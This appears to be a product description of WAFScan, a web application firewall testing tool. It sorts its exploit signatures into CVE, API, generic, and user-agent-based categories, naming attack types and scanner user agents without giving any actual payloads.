WAFScan tests your WAF’s ability to detect and respond to a wide range of signature-based web exploits, each classified by their specificity, purpose, and detection scope. These are divided into the following sub-categories:

1. CVE Exploits

• Definition: These are signatures that directly match known Common Vulnerabilities and Exposures (CVEs) with a high or critical CVSS score.

• Purpose: To ensure your WAF can block well-documented, real-world exploits.

• Example: SQLi or RCE payloads tied to Apache Struts, Log4Shell, or Drupalgeddon.

2. API Exploits

• Definition: Signatures targeting API-specific attack surfaces, typically involving JSON, XML, or binary payloads.

• Purpose: Test WAF parsing capabilities for REST, GraphQL, and gRPC interactions via fetch() or xhr.

• Example: Malformed JSON payloads, nested keys injection, and XML entity abuse.

 

3. Generic Exploits

• Definition: Broad detection rules designed to catch unknown or emerging threats, often referred to as heuristic or overlapping signatures.

• Purpose: These catch zero-day patterns or variations of known exploits that don’t map to a specific CVE.

• Example: Suspicious command sequences, special character abuse in inputs, or obfuscated SQL/JS code.

4. Informational / User-Agent-Based

• Definition: Low-risk but useful signatures based on known bad user agents, default admin URLs, or suspicious headers.

• Purpose: Often used for threat intelligence, bot detection, or identifying scanning tools.

• Example: Requests with user-agents like sqlmap, nmap, or URLs like /phpmyadmin.